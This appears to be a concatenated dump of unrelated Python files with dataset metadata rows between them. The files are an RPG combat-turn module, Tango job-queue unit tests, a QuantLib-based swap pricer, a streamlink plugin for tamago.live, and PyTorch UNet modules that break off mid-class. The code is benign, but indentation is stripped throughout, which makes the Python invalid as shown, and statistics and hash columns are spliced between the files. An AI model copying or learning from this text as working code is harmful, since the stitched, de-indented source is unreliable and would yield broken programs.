def pop_useitem_menu( self, explo, chara ):
mymenu = rpgmenu.PopUpMenu( explo.screen, explo.view )
for i in chara.contents:
if hasattr( i, "use" ):
mymenu.add_item( str( i ) , i )
mymenu.sort()
mymenu.add_alpha_keys()
choice = mymenu.query()
if choice:
if choice.use( chara, explo ):
self.end_turn( chara )
def pop_combat_menu( self, explo, chara ):
mymenu = rpgmenu.PopUpMenu( explo.screen, explo.view )
# Add the techniques.
techs = chara.get_invocations( True )
for t in techs:
mymenu.add_item( t.menu_str(), t )
mymenu.sort()
mymenu.add_alpha_keys()
mymenu.add_item( "-----", False )
if chara.can_use_holy_sign() and chara.holy_signs_used < chara.holy_signs_per_day():
mymenu.add_item( "Skill: Holy Sign [{0}/{1}]".format(chara.holy_signs_per_day()-chara.holy_signs_used,chara.holy_signs_per_day()) , 6 )
if chara.can_use_stealth() and not chara.hidden:
mymenu.add_item( "Skill: Stealth", 4 )
if self.num_enemies_hiding(chara):
mymenu.add_item( "Skill: Awareness", 5 )
if any( hasattr( i, "use" ) for i in chara.contents ):
mymenu.add_item( "Use Item", 7 )
mymenu.add_item( "View Inventory".format(str(chara)), 2 )
mymenu.add_item( "Focus on {0}".format(str(chara)), 1 )
mymenu.add_item( "End Turn".format(str(chara)), 3 )
choice = mymenu.query()
if choice == 1:
explo.view.focus( explo.screen, *chara.pos )
elif choice == 2:
explo.view_party( self.camp.party.index(chara), can_switch=False )
self.end_turn( chara )
elif choice == 3:
self.end_turn( chara )
elif choice == 4:
self.attempt_stealth( explo, chara )
elif choice == 5:
self.attempt_awareness( explo, chara )
elif choice == 6:
self.attempt_holy_sign( explo, chara )
elif choice == 7:
self.pop_useitem_menu( explo, chara )
elif choice:
# Presumably, this is an invocation of some kind.
if explo.pc_use_technique( chara, choice, choice.com_tar ):
self.end_turn( chara )
def do_player_action( self, explo, chara ):
#Start by making a hotmap centered on PC, to see how far can move.
hm = hotmaps.MoveMap( self.scene, chara )
tacred = TacticsRedraw( chara, self, explo, hm )
while self.can_act( chara ) and self.still_fighting():
# Get input and process it.
gdi = pygwrap.wait_event()
if gdi.type == pygwrap.TIMEREVENT:
explo.view.overlays.clear()
explo.view.overlays[ chara.pos ] = maps.OVERLAY_CURRENTCHARA
explo.view.overlays[ explo.view.mouse_tile ] = maps.OVERLAY_CURSOR
tacred( explo.screen )
pygame.display.flip()
else:
if gdi.type == pygame.KEYDOWN:
if gdi.str == "Q":
self.camp.save(explo.screen)
self.no_quit = False
elif gdi.str == "i":
explo.view_party( self.camp.party.index(chara), can_switch=False )
self.end_turn( chara )
elif gdi.str == "c":
explo.view.focus( explo.screen, *chara.pos )
elif gdi.str == " ":
self.end_turn( chara )
elif gdi.type == pygame.MOUSEBUTTONUP:
if gdi.button == 1:
# Left mouse button.
if ( explo.view.mouse_tile != chara.pos ) and self.scene.on_the_map( *explo.view.mouse_tile ):
tacred.hmap = None
target = explo.view.modelmap.get( explo.view.mouse_tile, None )
if target and target.is_hostile( self.camp ):
if chara.can_attack():
self.move_to_attack( explo, chara, target, tacred )
else:
explo.alert( "You are out of ammunition!" )
else:
self.move_player_to_spot( explo, chara, explo.view.mouse_tile, tacred )
tacred.hmap = hotmaps.MoveMap( self.scene, chara )
else:
self.pop_combat_menu( explo, chara )
def do_npc_action( self, explo, chara ):
tacred = TacticsRedraw( chara, self, explo )
tacred( explo.screen )
pygame.display.flip()
chara.COMBAT_AI.act( explo, chara, tacred )
self.end_turn( chara )
# If very far from nearest PC, deactivate.
for m in self.scene.contents:
enemy_found = False
if isinstance( m, characters.Character ) and chara.is_enemy( self.camp, m ) and self.scene.distance( chara.pos, m.pos ) <= 12:
enemy_found = True
break
if not enemy_found:
self.active.remove( chara )
def do_combat_action( self, explo, chara ):
"""Give this character its turn."""
started_turn_hidden = chara.hidden
# If you start your turn in a field, you get affected by that field.
fld = self.scene.get_field_at_spot( chara.pos )
if fld:
fld.invoke( explo )
# Check the character's condition to see what they can do...
if self.cstat[chara].paralysis > 0:
# This character can do nothing this turn.
self.end_turn( chara )
self.cstat[chara].paralysis += -1
elif self.cstat[chara].asleep:
# This character can do nothing this turn... may wake up.
self.end_turn( chara )
if random.randint(1,3) == 2:
self.cstat[chara].asleep = False
else:
# No special psychology or conditions- just do stuff.
if chara in self.camp.party:
self.do_player_action( explo, chara )
else:
self.do_npc_action( explo, chara )
# If they started the turn hidden, random chance of decloaking.
if started_turn_hidden and random.randint(1,10)==1:
chara.hidden = False
def give_xp_and_treasure( self, explo ):
"""Add up xp,gold from defeated monsters, and give to party."""
xp = 0
gold = 0
for m in self.active:
if m.is_hostile( self.camp ) and not m.is_alright() and not (hasattr(m,"combat_only") and m.combat_only):
xp += m.xp_value()
if hasattr( m, "gold" ) and m.gold > 0:
gold += m.gold
# Killing faction members worsens faction score.
if m.team.fac:
m.team.fac.reaction += -2
xp = int( xp * self.camp.xp_scale ) // self.camp.num_pcs()
explo.give_gold_and_xp( gold, xp, True )
def do_first_aid( self, explo ):
# At the end of combat, help anyone who was wounded.
fx = effects.HealthRestore( dice=(1,6,explo.camp.party_rank()), stat_bonus=None )
targets = list()
for pc in explo.camp.party:
if pc.is_alright() and hasattr( pc, "most_recent_wound" ) and pc.hp_damage > 0:
targets.append( pc.pos )
del pc.most_recent_wound
explo.invoke_effect( fx, None, targets )
def recover_fainted(self,explo):
for pc in explo.camp.party:
if not (pc.is_dead() or pc.is_alright()):
# This PC is neither dead nor alright- in other words, fainted.
pc.hp_damage = pc.max_hp() - 1
pc.place( explo.camp.scene, services.Temple.get_return_pos(explo) )
#explo.camp.scene.contents.append( pc )
def everybody_is_dead(self,explo):
# If the entire party is dead, dispose of their items and thwack their gold.
for pc in explo.camp.party:
pc.drop_everything(explo.camp.scene)
explo.camp.gold = explo.camp.gold // 4
def go( self, explo ):
"""Perform this combat."""
n = 0
while self.still_fighting():
if n >= len( self.active ):
# It's the end of the round.
n = 0
self.ap_spent.clear()
explo.update_monsters()
if self.active[n].is_alright():
chara = self.active[n]
self.do_combat_action( explo, chara )
# After action, invoke enchantments and renew attacks of opportunity
explo.invoke_enchantments( chara )
self.cstat[chara].aoo_readied = True
self.cstat[chara].attacks_so_far = 0
n += 1
if self.no_quit and not pygwrap.GOT_QUIT:
# Combat is over. Deal with things.
explo.check_trigger( "COMBATOVER" )
if self.camp.num_pcs() > 0:
# Combat has ended because we ran out of enemies. Dole experience.
self.give_xp_and_treasure( explo )
# Provide some end-of-combat first aid.
#self.do_first_aid(explo)
self.recover_fainted(explo)
# PCs stop hiding when combat ends.
for pc in self.camp.party:
pc.hidden = False
pc.condition.tidy( enchantments.COMBAT )
# Tidy up any combat enchantments.
for m in self.scene.contents[:]:
if hasattr( m, "condition" ):
m.condition.tidy( enchantments.COMBAT )
if hasattr( m, "combat_only" ) and m.combat_only:
self.scene.contents.remove( m )
elif hasattr( m, "mitose" ) and hasattr( m, "hp_damage" ):
# Slimes regenerate after battle, to prevent split/flee exploit.
m.hp_damage = 0
# I do not intend to create one more boring derivative fantasy RPG. I intend to create all of the boring derivative fantasy RPGs.
| 43.207447
| 232
| 0.57249
| 22,963
| 0.942304
| 0
| 0
| 0
| 0
| 0
| 0
| 3,684
| 0.151176
|
0b6a970c6ea0942a3a8927c5faff7c9dff07c309
| 4,096
|
py
|
Python
|
tests/testJobQueue.py
|
hartloff/Tango
|
9dd867a596441e0e2ba1069017781dddb9c79bdb
|
[
"Apache-2.0"
] | 2
|
2020-10-30T03:01:55.000Z
|
2021-03-25T03:18:12.000Z
|
tests/testJobQueue.py
|
hartloff/Tango
|
9dd867a596441e0e2ba1069017781dddb9c79bdb
|
[
"Apache-2.0"
] | 7
|
2018-06-26T02:48:09.000Z
|
2021-01-21T03:12:19.000Z
|
tests/testJobQueue.py
|
hartloff/Tango
|
9dd867a596441e0e2ba1069017781dddb9c79bdb
|
[
"Apache-2.0"
] | 9
|
2018-09-28T23:48:48.000Z
|
2021-10-03T20:29:48.000Z
|
import unittest
import redis
from jobQueue import JobQueue
from tangoObjects import TangoIntValue, TangoJob
from config import Config
class TestJobQueue(unittest.TestCase):
def setUp(self):
if Config.USE_REDIS:
__db = redis.StrictRedis(
Config.REDIS_HOSTNAME, Config.REDIS_PORT, db=0)
__db.flushall()
self.job1 = TangoJob(
name="sample_job_1",
vm="ilter.img",
outputFile="sample_job_1_output",
input=[],
timeout=30,
notifyURL="notifyMeUrl",
maxOutputFileSize=4096)
self.job2 = TangoJob(
name="sample_job_2",
vm="ilter.img",
outputFile="sample_job_2_output",
input=[],
timeout=30,
notifyURL="notifyMeUrl",
maxOutputFileSize=4096)
self.jobQueue = JobQueue(None)
self.jobQueue.reset()
self.jobId1 = self.jobQueue.add(self.job1)
self.jobId2 = self.jobQueue.add(self.job2)
def test_sharedInt(self):
if Config.USE_REDIS:
num1 = TangoIntValue("nextID", 1000)
num2 = TangoIntValue("nextID", 3000)
self.assertEqual(num1.get(), 1000)
self.assertEqual(num1.get(), num2.get())
else:
return
def test_job(self):
self.job1.makeUnassigned()
self.assertTrue(self.job1.isNotAssigned())
job = self.jobQueue.get(self.jobId1)
self.assertTrue(job.isNotAssigned())
self.job1.makeAssigned()
print "Checkout:"
self.assertFalse(self.job1.isNotAssigned())
self.assertFalse(job.isNotAssigned())
def test_add(self):
info = self.jobQueue.getInfo()
self.assertEqual(info['size'], 2)
def test_addDead(self):
return self.assertEqual(1, 1)
def test_remove(self):
self.jobQueue.remove(self.jobId1)
info = self.jobQueue.getInfo()
self.assertEqual(info['size'], 1)
self.jobQueue.remove(self.jobId2)
info = self.jobQueue.getInfo()
self.assertEqual(info['size'], 0)
def test_delJob(self):
self.jobQueue.delJob(self.jobId1, 0)
info = self.jobQueue.getInfo()
self.assertEqual(info['size'], 1)
self.assertEqual(info['size_deadjobs'], 1)
self.jobQueue.delJob(self.jobId1, 1)
info = self.jobQueue.getInfo()
self.assertEqual(info['size_deadjobs'], 0)
return False
def test_get(self):
ret_job_1 = self.jobQueue.get(self.jobId1)
self.assertEqual(str(ret_job_1.id), self.jobId1)
ret_job_2 = self.jobQueue.get(self.jobId2)
self.assertEqual(str(ret_job_2.id), self.jobId2)
def test_getNextPendingJob(self):
self.jobQueue.assignJob(self.jobId2)
self.jobQueue.unassignJob(self.jobId1)
exp_id = self.jobQueue.getNextPendingJob()
self.assertMultiLineEqual(exp_id, self.jobId1)
def test_getNextPendingJobReuse(self):
return False
def test_assignJob(self):
self.jobQueue.assignJob(self.jobId1)
job = self.jobQueue.get(self.jobId1)
self.assertFalse(job.isNotAssigned())
def test_unassignJob(self):
self.jobQueue.assignJob(self.jobId1)
job = self.jobQueue.get(self.jobId1)
self.assertTrue(job.assigned)
self.jobQueue.unassignJob(self.jobId1)
job = self.jobQueue.get(self.jobId1)
return self.assertEqual(job.assigned, False)
def test_makeDead(self):
info = self.jobQueue.getInfo()
self.assertEqual(info['size_deadjobs'], 0)
self.jobQueue.makeDead(self.jobId1, "test")
info = self.jobQueue.getInfo()
self.assertEqual(info['size_deadjobs'], 1)
def test__getNextID(self):
init_id = self.jobQueue.nextID
for i in xrange(1, Config.MAX_JOBID + 100):
id = self.jobQueue._getNextID()
self.assertNotEqual(str(id), self.jobId1)
self.jobQueue.nextID = init_id
if __name__ == '__main__':
unittest.main()
| 29.681159
| 63
| 0.619141
| 3,910
| 0.95459
| 0
| 0
| 0
| 0
| 0
| 0
| 245
| 0.059814
|
0b6b9493f9b4caffc3dc8d7eb74ffd39200333e1
| 6,891
|
py
|
Python
|
hybmc/products/Swap.py
|
sschlenkrich/HybridMonteCarlo
|
72f54aa4bcd742430462b27b72d70369c01f9ac4
|
[
"MIT"
] | 3
|
2021-08-18T18:34:41.000Z
|
2021-12-24T07:05:19.000Z
|
hybmc/products/Swap.py
|
sschlenkrich/HybridMonteCarlo
|
72f54aa4bcd742430462b27b72d70369c01f9ac4
|
[
"MIT"
] | null | null | null |
hybmc/products/Swap.py
|
sschlenkrich/HybridMonteCarlo
|
72f54aa4bcd742430462b27b72d70369c01f9ac4
|
[
"MIT"
] | 3
|
2021-01-31T11:41:19.000Z
|
2022-03-25T19:51:20.000Z
|
#!/usr/bin/python
import sys
sys.path.append('./')
import QuantLib as ql
from hybmc.simulations.Payoffs import Payoff, Fixed, ZeroBond, LiborRate, Cache, Asset
from hybmc.simulations.AmcPayoffs import AmcSum
from hybmc.products.Product import Product
def DiscountedPayoffFromCashFlow(cf, obsTime, payOrReceive, discYtsH=None, currencyAlias=None):
# this is a bit dangerous if someone changes evaluation date
today = ql.Settings.instance().getEvaluationDate()
# model time is measured via Act/365 (Fixed)
dc = ql.Actual365Fixed()
# first try a libor coupon
cp = ql.as_floating_rate_coupon(cf)
if cp is not None:
# first we need to puzzle out the dates for the index
projIndex = ql.as_iborindex(cp.index())
fixingDate = cp.fixingDate()
startDate = projIndex.valueDate(fixingDate)
endDate = projIndex.maturityDate(startDate)
#print(index, fixingDate, startDate, endDate)
tau = projIndex.dayCounter().yearFraction(startDate,endDate)
tenorBasis = 1.0 # default
if discYtsH is not None:
# we apply deterministic basis calculation
dfProj = 1.0 + tau*projIndex.fixing(fixingDate)
discIndex = projIndex.clone(discYtsH)
dfDisc = 1.0 + tau*discIndex.fixing(fixingDate)
tenorBasis = dfProj / dfDisc
#print(tenorBasis)
fixingTime = dc.yearFraction(today,fixingDate)
startTime = dc.yearFraction(today,startDate)
endTime = dc.yearFraction(today,endDate)
# fixed Libor or Libor forward rate
L = LiborRate(min(fixingTime,obsTime),startTime,endTime,tau,tenorBasis,currencyAlias)
if cp.spread()!=0.0:
L = L + cp.spread()
# we treat deterministic factors separately to avoid unneccessary multiplications
cpFactor = cp.nominal() * cp.accrualPeriod()
else:
L = 1.0 # used as pseudo-rate here
cpFactor = cf.amount() # treat it as a fixed cash flow
#
payTime = dc.yearFraction(today,cf.date())
cashFlow = payOrReceive * cpFactor * L * ZeroBond(obsTime,payTime,currencyAlias)
if currencyAlias is not None:
cashFlow = Asset(obsTime,currencyAlias) * cashFlow
#
return cashFlow @ obsTime
class Swap(Product):
# Python constructor
def __init__(self, qlLegs, payOrRecs, discYtsHs=None, currencyAliases=None):
self.qlLegs = qlLegs # a list of Legs
self.payOrRecs = payOrRecs # a list of Payer (-1) or Receiver (+1) flags
# we need to normalise optional inputs
if type(discYtsHs)==list:
self.discYtsHs = discYtsHs
else:
self.discYtsHs = [ discYtsHs for l in self.qlLegs ]
if type(currencyAliases)==list:
self.currencyAliases = currencyAliases
else:
self.currencyAliases = [ currencyAliases for l in self.qlLegs ]
def cashFlows(self, obsTime):
# we calculate times relative to global evaluation date
# this is a bit dangerous if someone changes evaluation date
today = ql.Settings.instance().getEvaluationDate()
# model time is measured via Act/365 (Fixed)
dc = ql.Actual365Fixed()
# we assume our swap has exactly two legs
cfs = []
for leg, por, discYtsH, alias in zip(self.qlLegs, self.payOrRecs,self.discYtsHs,self.currencyAliases):
for cf in leg:
payTime = dc.yearFraction(today,cf.date())
if payTime>obsTime: # only consider future cash flows
#print('%s: %f, %f' % (cf.date(),cf.amount(),payTime))
p = DiscountedPayoffFromCashFlow(cf,obsTime,por,discYtsH,alias)
cfs.append(p)
# print(p)
return cfs
def PayoffFromCashFlow(cf, payOrReceive, discYtsH=None):
# this is a bit dangerous if someone changes evaluation date
today = ql.Settings.instance().getEvaluationDate()
# model time is measured via Act/365 (Fixed)
dc = ql.Actual365Fixed()
#
payTime = dc.yearFraction(today,cf.date())
# first we try fixed rate cash flow
cp = ql.as_fixed_rate_coupon(cf)
if cp is not None:
return Fixed(payOrReceive*cp.amount()) @ payTime
# second try a libor coupon
cp = ql.as_floating_rate_coupon(cf)
if cp is not None:
# first we need to puzzle out the dates for the index
projIndex = ql.as_iborindex(cp.index())
fixingDate = cp.fixingDate()
startDate = projIndex.valueDate(fixingDate)
endDate = projIndex.maturityDate(startDate)
#print(index, fixingDate, startDate, endDate)
tau = projIndex.dayCounter().yearFraction(startDate,endDate)
tenorBasis = 1.0 # default
if discYtsH is not None:
# we apply deterministic basis calculation
dfProj = 1.0 + tau*projIndex.fixing(fixingDate)
discIndex = projIndex.clone(discYtsH)
dfDisc = 1.0 + tau*discIndex.fixing(fixingDate)
tenorBasis = dfProj / dfDisc
#print(tenorBasis)
fixingTime = dc.yearFraction(today,fixingDate)
startTime = dc.yearFraction(today,startDate)
endTime = dc.yearFraction(today,endDate)
# fixed Libor or Libor forward rate
L = LiborRate(fixingTime,startTime,endTime,tau,tenorBasis)
factor = payOrReceive * cp.nominal() * cp.accrualPeriod()
return ( factor * (L + cp.spread()) ) @ payTime
return None
class AmcSwap(Product):
# Python constructor, only single-currency
def __init__(self, qlLegs, payOrRecs, mcSim, maxDegree=2, discYtsH=None):
self.qlLegs = qlLegs # a list of Legs
self.payOrRecs = payOrRecs # a list of Payer (-1) or Receiver (+1) flags
self.mcSim = mcSim
self.maxDegree = maxDegree
self.discYtsH = discYtsH
# we want to re-use payoffs
today = ql.Settings.instance().getEvaluationDate()
# model time is measured via Act/365 (Fixed)
dc = ql.Actual365Fixed()
self.cfs = []
for leg, por in zip(self.qlLegs, self.payOrRecs):
for cf in leg:
payTime = dc.yearFraction(today,cf.date())
if payTime>0.0: # only consider future cash flows
p = PayoffFromCashFlow(cf,por,self.discYtsH)
self.cfs.append(Cache(p)) # this is the magic
def cashFlows(self, obsTime):
cfs = []
for cf in self.cfs:
if cf.obsTime>obsTime:
cfs.append(cf)
# we use a 'co-terminal' Libor rate as observable
tMax = max([ cf.obsTime for cf in self.cfs ])
L = LiborRate(obsTime,obsTime,tMax)
p = AmcSum(obsTime,cfs,[L],self.mcSim,self.maxDegree)
return [ p ]
| 43.06875
| 110
| 0.628646
| 2,860
| 0.415034
| 0
| 0
| 0
| 0
| 0
| 0
| 1,565
| 0.227108
|
0b6dc7197643d4c8de27269ff87d6ea19785b867
| 1,571
|
py
|
Python
|
src/streamlink/plugins/tamago.py
|
hymer-up/streamlink
|
f09bf6e04cddc78eceb9ded655f716ef3ee4b84f
|
[
"BSD-2-Clause"
] | 5
|
2019-07-26T17:03:26.000Z
|
2020-10-17T23:23:43.000Z
|
src/streamlink/plugins/tamago.py
|
hymer-up/streamlink
|
f09bf6e04cddc78eceb9ded655f716ef3ee4b84f
|
[
"BSD-2-Clause"
] | 9
|
2018-01-14T15:20:23.000Z
|
2021-03-08T20:29:51.000Z
|
src/streamlink/plugins/tamago.py
|
bumplzz69/streamlink
|
34abc43875d7663ebafa241573dece272e93d88b
|
[
"BSD-2-Clause"
] | 4
|
2018-01-14T13:27:25.000Z
|
2021-11-15T22:28:30.000Z
|
import re
from streamlink.plugin import Plugin
from streamlink.plugin.api import validate
from streamlink.stream import HTTPStream
from streamlink import NoStreamsError
class Tamago(Plugin):
_url_re = re.compile(r"https?://(?:player\.)?tamago\.live/w/(?P<id>\d+)")
_api_url_base = "https://player.tamago.live/api/rooms/{id}"
_api_response_schema = validate.Schema({
u"status": 200,
u"message": u"Success",
u"data": {
u"room_number": validate.text,
u"stream": {validate.text: validate.url()}
}
})
_stream_qualities = {
u"150": "144p",
u"350": "360p",
u"550": "540p",
u"900": "720p",
}
@classmethod
def can_handle_url(cls, url):
return cls._url_re.match(url) is not None
def _get_streams(self):
user_id = self._url_re.match(self.url).group('id')
try:
api_response = self.session.http.get(self._api_url_base.format(id=user_id))
streams = self.session.http.json(api_response, schema=self._api_response_schema)['data']['stream']
except Exception:
raise NoStreamsError(self.url)
unique_stream_urls = []
for stream in streams.keys():
if streams[stream] not in unique_stream_urls:
unique_stream_urls.append(streams[stream])
quality = self._stream_qualities[stream] if stream in self._stream_qualities.keys() else "720p+"
yield quality, HTTPStream(self.session, streams[stream])
__plugin__ = Tamago
| 29.641509
| 112
| 0.623806
| 1,376
| 0.875875
| 738
| 0.469764
| 96
| 0.061108
| 0
| 0
| 226
| 0.143857
|
0b6e713eceaaae29df8407fca294483723c28e41
| 17,811
|
py
|
Python
|
models/misc/modules.py
|
zgjslc/Film-Recovery-master1
|
4497a9930398c9e826ac364056a79e5bcbf6c953
|
[
"Apache-2.0"
] | null | null | null |
models/misc/modules.py
|
zgjslc/Film-Recovery-master1
|
4497a9930398c9e826ac364056a79e5bcbf6c953
|
[
"Apache-2.0"
] | null | null | null |
models/misc/modules.py
|
zgjslc/Film-Recovery-master1
|
4497a9930398c9e826ac364056a79e5bcbf6c953
|
[
"Apache-2.0"
] | null | null | null |
"""
Name: modules.py
Desc: This script defines some base module for building networks.
"""
from typing import Any
import torch
import torch.nn as nn
import torch.nn.functional as F
class UNet_down_block(nn.Module):
def __init__(self, input_channel, output_channel, down_size=True):
super(UNet_down_block, self).__init__()
self.conv1 = nn.Conv2d(input_channel, output_channel, 3, padding=1)
self.bn1 = nn.GroupNorm(8, output_channel)
self.conv2 = nn.Conv2d(output_channel, output_channel, 3, padding=1)
self.bn2 = nn.GroupNorm(8, output_channel)
self.conv3 = nn.Conv2d(output_channel, output_channel, 3, padding=1)
self.bn3 = nn.GroupNorm(8, output_channel)
self.max_pool = nn.MaxPool2d(2, 2)
self.relu = nn.ReLU()
self.down_size = down_size
def forward(self, x):
x = self.relu(self.bn1(self.conv1(x)))
x = self.relu(self.bn2(self.conv2(x)))
x = self.relu(self.bn3(self.conv3(x)))
if self.down_size:
x = self.max_pool(x)
return x
class UNet_up_block(nn.Module):
def __init__(self, prev_channel, input_channel, output_channel, up_sample=True):
super(UNet_up_block, self).__init__()
self.up_sampling = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=False)
self.conv1 = nn.Conv2d(prev_channel + input_channel, output_channel, 3, padding=1)
self.bn1 = nn.GroupNorm(8, output_channel)
self.conv2 = nn.Conv2d(output_channel, output_channel, 3, padding=1)
self.bn2 = nn.GroupNorm(8, output_channel)
self.conv3 = nn.Conv2d(output_channel, output_channel, 3, padding=1)
self.bn3 = nn.GroupNorm(8, output_channel)
self.relu = torch.nn.ReLU()
self.up_sample = up_sample
def forward(self, prev_feature_map, x):
if self.up_sample:
x = self.up_sampling(x)
x = torch.cat((x, prev_feature_map), dim=1)
x = self.relu(self.bn1(self.conv1(x)))
x = self.relu(self.bn2(self.conv2(x)))
x = self.relu(self.bn3(self.conv3(x)))
return x
class UNet(nn.Module):
def __init__(self, downsample=6, in_channels=3, out_channels=3):
super(UNet, self).__init__()
self.in_channels, self.out_channels, self.downsample = in_channels, out_channels, downsample
self.down1 = UNet_down_block(in_channels, 16, False)
self.down_blocks = nn.ModuleList(
[UNet_down_block(2**(4+i), 2**(5+i), True) for i in range(0, downsample)]
)
bottleneck = 2**(4 + downsample)
self.mid_conv1 = nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn1 = nn.GroupNorm(8, bottleneck)
self.mid_conv2 = nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn2 = nn.GroupNorm(8, bottleneck)
self.mid_conv3 = torch.nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn3 = nn.GroupNorm(8, bottleneck)
self.up_blocks = nn.ModuleList(
[UNet_up_block(2**(4+i), 2**(5+i), 2**(4+i)) for i in range(0, downsample)]
)
self.last_conv1 = nn.Conv2d(16, 16, 3, padding=1)
self.last_bn = nn.GroupNorm(8, 16)
self.last_conv2 = nn.Conv2d(16, out_channels, 1, padding=0)
self.relu = nn.ReLU()
def forward(self, x):
x = self.down1(x)
xvals = [x]
for i in range(0, self.downsample):
x = self.down_blocks[i](x)
xvals.append(x)
x = self.relu(self.bn1(self.mid_conv1(x)))
x = self.relu(self.bn2(self.mid_conv2(x)))
x = self.relu(self.bn3(self.mid_conv3(x)))
for i in range(0, self.downsample)[::-1]:
x = self.up_blocks[i](xvals[i], x)
x = self.relu(self.last_bn(self.last_conv1(x)))
x = self.relu(self.last_conv2(x))
#x = self.last_conv2(x)
return x
'''
class UNetDepth(nn.Module):
def __init__(self):
super(UNetDepth, self).__init__()
self.down_block1 = UNet_down_block(3, 16, False)
self.down_block2 = UNet_down_block(16, 32, True)
self.down_block3 = UNet_down_block(32, 64, True)
self.down_block4 = UNet_down_block(64, 128, True)
self.down_block5 = UNet_down_block(128, 256, True)
self.down_block6 = UNet_down_block(256, 512, True)
self.down_block7 = UNet_down_block(512, 1024, False)
self.mid_conv1 = nn.Conv2d(1024, 1024, 3, padding=1)
self.bn1 = nn.GroupNorm(8, 1024)
self.mid_conv2 = nn.Conv2d(1024, 1024, 3, padding=1)
self.bn2 = nn.GroupNorm(8, 1024)
self.mid_conv3 = torch.nn.Conv2d(1024, 1024, 3, padding=1)
self.bn3 = torch.nn.GroupNorm(8, 1024)
self.up_block1 = UNet_up_block(512, 1024, 512, False)
self.up_block2 = UNet_up_block(256, 512, 256, True)
self.up_block3 = UNet_up_block(128, 256, 128, True)
self.up_block4 = UNet_up_block(64, 128, 64, True)
self.up_block5 = UNet_up_block(32, 64, 32, True)
self.up_block6 = UNet_up_block(16, 32, 16, True)
self.last_conv1 = nn.Conv2d(16, 16, 3, padding=1)
self.last_bn = nn.GroupNorm(8, 16)
self.last_conv2 = nn.Conv2d(16, 1, 1, padding=0)
self.relu = nn.ReLU()
def forward(self, x):
x = self.x1 = self.down_block1(x)
x = self.x2 = self.down_block2(self.x1)
x = self.x3 = self.down_block3(self.x2)
x = self.x4 = self.down_block4(self.x3)
x = self.x5 = self.down_block5(self.x4)
x = self.x6 = self.down_block6(self.x5)
x = self.x7 = self.down_block7(self.x6)
x = self.relu(self.bn1(self.mid_conv1(x)))
x = self.relu(self.bn2(self.mid_conv2(x)))
x = self.relu(self.bn3(self.mid_conv3(x)))
x = self.up_block1(self.x6, x)
x = self.up_block2(self.x5, x)
x = self.up_block3(self.x4, x)
x = self.up_block4(self.x3, x)
x = self.up_block5(self.x2, x)
x = self.up_block6(self.x1, x)
x = self.relu(self.last_bn(self.last_conv1(x)))
x = self.last_conv2(x)
return x
'''
class UNetDepth(nn.Module):
def __init__(self):
super(UNetDepth, self).__init__()
self.down_block1 = UNet_down_block(3, 16, False)
self.down_block2 = UNet_down_block(16, 32, True)
self.down_block3 = UNet_down_block(32, 64, True)
self.down_block4 = UNet_down_block(64, 128, True)
self.down_block5 = UNet_down_block(128, 256, True)
self.down_block6 = UNet_down_block(256, 512, False)
self.mid_conv1 = nn.Conv2d(512, 512, 3, padding=1)
self.bn1 = nn.GroupNorm(8, 512)
self.mid_conv2 = nn.Conv2d(512, 512, 3, padding=1)
self.bn2 = nn.GroupNorm(8, 512)
self.mid_conv3 = torch.nn.Conv2d(512, 512, 3, padding=1)
self.bn3 = torch.nn.GroupNorm(8, 512)
self.up_block1 = UNet_up_block(256, 512, 256, False)
self.up_block2 = UNet_up_block(128, 256, 128, True)
self.up_block3 = UNet_up_block(64, 128, 64, True)
self.up_block4 = UNet_up_block(32, 64, 32, True)
self.up_block5 = UNet_up_block(16, 32, 16, True)
self.last_conv1 = nn.Conv2d(16, 16, 3, padding=1)
self.last_bn = nn.GroupNorm(8, 16)
self.last_conv2 = nn.Conv2d(16, 1, 1, padding=0)
self.relu = nn.ReLU()
def forward(self, x):
x = self.x1 = self.down_block1(x)
x = self.x2 = self.down_block2(self.x1)
x = self.x3 = self.down_block3(self.x2)
x = self.x4 = self.down_block4(self.x3)
x = self.x5 = self.down_block5(self.x4)
x = self.x6 = self.down_block6(self.x5)
x = self.relu(self.bn1(self.mid_conv1(x)))
x = self.relu(self.bn2(self.mid_conv2(x)))
x = self.relu(self.bn3(self.mid_conv3(x)))
x = self.up_block1(self.x5, x)
x = self.up_block2(self.x4, x)
x = self.up_block3(self.x3, x)
x = self.up_block4(self.x2, x)
x = self.up_block5(self.x1, x)
x = self.relu(self.last_bn(self.last_conv1(x)))
x = self.last_conv2(x)
return x
class UNet_sim(nn.Module):
def __init__(self, downsample=4, in_channels=3, out_channels=3):
super(UNet_sim, self).__init__()
self.downsample, self.in_channels, self.out_channels = downsample, in_channels, out_channels
self.conv = ConvBlock(in_channels, 64)
self.down_blocks = nn.ModuleList(
[UNet_down_block(2 ** (6 + i), 2 ** (7 + i), True) for i in range(0, downsample)]
)
bottleneck = 2 ** (6 + downsample)
self.mid_conv1 = nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn1 = nn.GroupNorm(8, bottleneck)
self.mid_conv2 = nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn2 = nn.GroupNorm(8, bottleneck)
self.mid_conv3 = torch.nn.Conv2d(bottleneck, bottleneck, 3, padding=1)
self.bn3 = nn.GroupNorm(8, bottleneck)
self.up_blocks = nn.ModuleList(
[UNet_up_block(2 ** (6 + i), 2 ** (7 + i), 2 ** (6 + i)) for i in range(0, downsample)]
)
self.last_conv1 = nn.Conv2d(64, 64, 3, padding=1)
self.last_bn = nn.GroupNorm(8, 64)
self.last_conv2 = nn.Conv2d(64, out_channels, 1, padding=0)
self.relu = nn.ReLU()
def forward(self, x):
x = self.conv(x)
xvals = [x]
for i in range(0, self.downsample):
x = self.down_blocks[i](x)
xvals.append(x)
x = self.relu(self.bn1(self.mid_conv1(x)))
x = self.relu(self.bn2(self.mid_conv2(x)))
x = self.relu(self.bn3(self.mid_conv3(x)))
for i in range(0, self.downsample)[::-1]:
x = self.up_blocks[i](xvals[i], x)
x = self.last_bn(self.last_conv1(x))
x = self.last_conv2(x)
return x
class Encoder(nn.Module):
def __init__(self, downsample=6, in_channels=3):
""":downsample the number of down blocks
:in_channels the channel of input tensor
"""
super(Encoder, self).__init__()
self.in_channels, self.downsample = in_channels, downsample
self.down1 = UNet_down_block(in_channels, 16, False)
self.down_blocks = nn.ModuleList(
[UNet_down_block(2 ** (4 + i), 2 ** (5 + i), True) for i in range(0, downsample)]
)
bottleneck = 2 ** (4 + downsample)
